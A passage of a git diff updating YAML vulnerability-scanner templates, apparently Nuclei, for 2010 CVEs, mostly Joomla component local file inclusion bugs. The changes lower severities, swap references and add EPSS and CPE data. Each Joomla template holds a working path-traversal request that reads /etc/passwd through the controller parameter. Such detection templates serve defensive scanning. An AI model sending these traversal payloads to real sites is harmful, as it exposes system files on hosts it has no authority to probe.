"{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 34db415607..8a6311343e 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -3,31 +3,36 @@ id: CVE-2010-1607 info: name: Joomla! Component WMI 1.5.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12316 - https://nvd.nist.gov/vuln/detail/CVE-2010-1607 - - http://web.archive.org/web/20210121195713/https://www.securityfocus.com/bid/39608/ - - http://web.archive.org/web/20111227231442/http://secunia.com/advisories/39539/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58032 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1607 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01726 + cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: paysyspro + product: com_wmi + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index c3fa85c4e4..2d28834831 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -9,25 +9,31 @@ info: - https://www.exploit-db.com/exploits/12430 - https://nvd.nist.gov/vuln/detail/CVE-2010-1653 - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt - - http://web.archive.org/web/20210121195909/https://www.securityfocus.com/bid/39743/ + - http://www.vupen.com/english/advisories/2010/1004 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1653 cwe-id: CWE-22 - tags: edb,packetstorm,cve,cve2010,joomla,lfi + epss-score: 0.03527 + cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: htmlcoderhelper + product: com_graphics + tags: edb,packetstorm,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index d22fa195a2..035fc9455b 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -3,31 +3,37 @@ id: CVE-2010-1657 info: name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-1657 - https://www.exploit-db.com/exploits/12428 - http://www.vupen.com/english/advisories/2010/1006 - - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39740/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58175 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1657 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01751 + cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: recly + product: com_smartsite + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index eb416dd006..79960b5666 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -3,30 +3,37 @@ id: CVE-2010-1658 info: name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12427 - https://nvd.nist.gov/vuln/detail/CVE-2010-1658 - http://www.vupen.com/english/advisories/2010/1007 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58176 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1658 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01751 + cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: code-garage + product: com_noticeboard + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 04dc0747fd..fcf1555354 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -3,31 +3,38 @@ id: CVE-2010-1659 info: name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12426 - https://nvd.nist.gov/vuln/detail/CVE-2010-1659 - - http://web.archive.org/web/20210121195906/https://www.securityfocus.com/bid/39739/ - http://www.exploit-db.com/exploits/12426 + - http://www.vupen.com/english/advisories/2010/1008 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58177 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1659 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01806 + cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: webkul + product: com_ultimateportfolio + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index e811f7b05c..dc6c25110d 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -3,31 +3,38 @@ id: CVE-2010-1714 info: name: Joomla! Component Arcade Games 1.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12168 - https://nvd.nist.gov/vuln/detail/CVE-2010-1714 - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt - - http://web.archive.org/web/20140723192327/http://secunia.com/advisories/39413/ + - http://www.vupen.com/english/advisories/2010/0860 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57683 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1714 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb,packetstorm + epss-score: 0.01751 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_arcadegames:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dev.pucit.edu.pk + product: com_arcadegames + tags: cve,cve2010,joomla,lfi,edb,packetstorm http: - method: GET path: - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 19351cba5f..bb94c2bbae 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -3,30 +3,37 @@ id: CVE-2010-1715 info: name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12174 - https://nvd.nist.gov/vuln/detail/CVE-2010-1715 - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57677 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1715 cwe-id: CWE-22 - tags: joomla,lfi,edb,packetstorm,cve,cve2010 + epss-score: 0.01242 + cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: pucit.edu + product: com_onlineexam + tags: joomla,lfi,edb,packetstorm,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 6f2d0e9012..7fba0e1949 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -8,26 +8,32 @@ info: reference: - https://www.exploit-db.com/exploits/12291 - https://nvd.nist.gov/vuln/detail/CVE-2010-1717 - - http://web.archive.org/web/20140805095004/http://secunia.com/advisories/39526/ - http://www.vupen.com/english/advisories/2010/0924 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P - cvss-score: 6.8 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1717 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.01733 + cpe: cpe:2.3:a:if_surfalert_project:if_surfalert:1.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + framework: joomla\! + vendor: if_surfalert_project + product: if_surfalert + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index b23bfceafd..f1048f6958 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -3,7 +3,7 @@ id: CVE-2010-1718 info: name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12282 @@ -15,19 +15,25 @@ info: cvss-score: 6.8 cve-id: CVE-2010-1718 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.00826 + cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lispeltuut + product: com_archeryscores + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 34d3cbf00a..5eb702c332 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -3,30 +3,37 @@ id: CVE-2010-1719 info: name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12233 - https://nvd.nist.gov/vuln/detail/CVE-2010-1719 - http://www.exploit-db.com/exploits/12233 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57850 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1719 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2010,joomla + epss-score: 0.01671 + cpe: cpe:2.3:a:moto-treks:com_mtfireeagle:1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: moto-treks + product: com_mtfireeagle + tags: lfi,edb,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 612d9cc3fa..f423093ed6 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -3,31 +3,37 @@ id: CVE-2010-1722 info: name: Joomla! Component Online Market 2.x - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12177 - https://nvd.nist.gov/vuln/detail/CVE-2010-1722 - - http://web.archive.org/web/20140723201810/http://secunia.com/advisories/39409/ - http://www.exploit-db.com/exploits/12177 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57674 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1722 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_market:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dev.pucit.edu.pk + product: com_market + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index d1796e1f2b..8fffaead73 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -3,31 +3,37 @@ id: CVE-2010-1723 info: name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12289 - https://nvd.nist.gov/vuln/detail/CVE-2010-1723 - - http://web.archive.org/web/20140805101847/http://secunia.com/advisories/39524/ - http://www.exploit-db.com/exploits/12289 + - http://www.vupen.com/english/advisories/2010/0926 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1723 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01956 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlacomponent.inetlanka + product: com_drawroot + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 96001f37f7..845055c6be 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -3,32 +3,38 @@ id: CVE-2010-1858 info: name: Joomla! Component SMEStorage - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11853 - https://nvd.nist.gov/vuln/detail/CVE-2010-1858 - - http://web.archive.org/web/20210121194940/https://www.securityfocus.com/bid/38911/ - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57108 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1858 cwe-id: CWE-22 - tags: cve2010,joomla,lfi,edb,packetstorm,cve + epss-score: 0.01155 + cpe: cpe:2.3:a:gelembjuk:com_smestorage:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: gelembjuk + product: com_smestorage + tags: cve2010,joomla,lfi,edb,packetstorm,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index f51e245222..c57eaff005 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -3,21 +3,26 @@ id: CVE-2010-1870 info: name: ListSERV Maestro <= 9.0-8 RCE author: b0yd - severity: info + severity: medium description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8. reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt - https://www.exploit-db.com/exploits/14360 - http://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-06-16 + - http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html classification: - cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N cvss-score: 5 cve-id: CVE-2010-1870 cwe-id: CWE-917 - tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl + epss-score: 0.03864 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: struts + tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl http: - method: GET diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index e5e01d0064..93313a230d 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -8,26 +8,32 @@ info: reference: - https://www.exploit-db.com/exploits/11851 - https://nvd.nist.gov/vuln/detail/CVE-2010-1875 - - http://web.archive.org/web/20140802140355/http://secunia.com/advisories/39074/ - - http://web.archive.org/web/20210121194939/https://www.securityfocus.com/bid/38912/ + - http://www.exploit-db.com/exploits/11851 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57110 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1875 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01724 + cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: com-property + product: com_properties + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index b7e1ce6f80..16a6c6778b 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -8,26 +8,32 @@ info: reference: - https://www.exploit-db.com/exploits/12317 - https://nvd.nist.gov/vuln/detail/CVE-2010-1878 - - http://web.archive.org/web/20210121195712/https://www.securityfocus.com/bid/39606/ - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/58031 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1878 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.00826 + cpe: cpe:2.3:a:blueflyingfish.no-ip:com_orgchart:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: blueflyingfish.no-ip + product: com_orgchart + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 4547145d0a..47ac9294fe 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/12239 - https://nvd.nist.gov/vuln/detail/CVE-2010-1952 - - http://web.archive.org/web/20151016194238/http://secunia.com/advisories/39475/ - http://www.exploit-db.com/exploits/12239 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57845 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1952 cwe-id: CWE-22 - tags: cve,cve2010,joomla,lfi,edb + epss-score: 0.01242 + cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cmstactics + product: com_beeheard + tags: cve,cve2010,joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index a1d32b283c..acfb3dd5c0 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -13,22 +13,28 @@ info: remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2010-1953 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve2010,joomla,lfi,edb,cve + epss-score: 0.05684 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlacomponent.inetlanka + product: com_multimap + tags: cve2010,joomla,lfi,edb,cve http: - method: GET path: - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index f53f57ea13..4d1be5522d 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -8,27 +8,33 @@ info: reference: - https://www.exploit-db.com/exploits/12287 - https://nvd.nist.gov/vuln/detail/CVE-2010-1954 - - http://web.archive.org/web/20210121195625/https://www.securityfocus.com/bid/39552/ - http://www.exploit-db.com/exploits/12287 + - http://www.vupen.com/english/advisories/2010/0928 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1954 cwe-id: CWE-22 - tags: edb,cve,cve2010,joomla,lfi + epss-score: 0.05684 + cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multiroot:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlacomponent.inetlanka + product: com_multiroot + tags: edb,cve,cve2010,joomla,lfi http: - method: GET path: - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index c1d4bf15f9..158a2512c2 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -8,27 +8,32 @@ info: reference: - https://www.exploit-db.com/exploits/12238 - https://nvd.nist.gov/vuln/detail/CVE-2010-1955 - - http://web.archive.org/web/20210121195552/https://www.securityfocus.com/bid/39508/ - - http://web.archive.org/web/20140803091440/http://secunia.com/advisories/39473/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57846 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1955 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2010,joomla + epss-score: 0.01671 + cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thefactory + product: com_blogfactory + tags: lfi,edb,cve,cve2010,joomla http: - method: GET path: - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 525338fdda..96cfb215e2 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -8,27 +8,34 @@ info: reference: - https://www.exploit-db.com/exploits/12285 - https://nvd.nist.gov/vuln/detail/CVE-2010-1956 - - http://web.archive.org/web/20140805105431/http://secunia.com/advisories/39522/ - http://www.exploit-db.com/exploits/12285 + - http://www.thefactory.ro/all-thefactory-products/gadget-factory-for-joomla-1.5.x/detailed-product-flyer.html + - http://www.vupen.com/english/advisories/2010/0930 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1956 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2010 + epss-score: 0.06055 + cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thefactory + product: com_gadgetfactory + tags: joomla,lfi,edb,cve,cve2010 http: - method: GET path: - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - type: status status: - 200 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index bfc3674cd6..ef07a880c9 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -9,15 +9,20 @@ info: - https://www.exploit-db.com/exploits/12235 - https://nvd.nist.gov/vuln/detail/CVE-2010-1957 - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/57849 remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1957 cwe-id: CWE-22 - tags: lfi,edb,packetstorm,cve,cve2010,joomla + epss-score: 0.01671 + cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: thefactory + product: com_lovefactory + tags: lfi,edb,packetstorm,cve,cve2010,joomla http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and 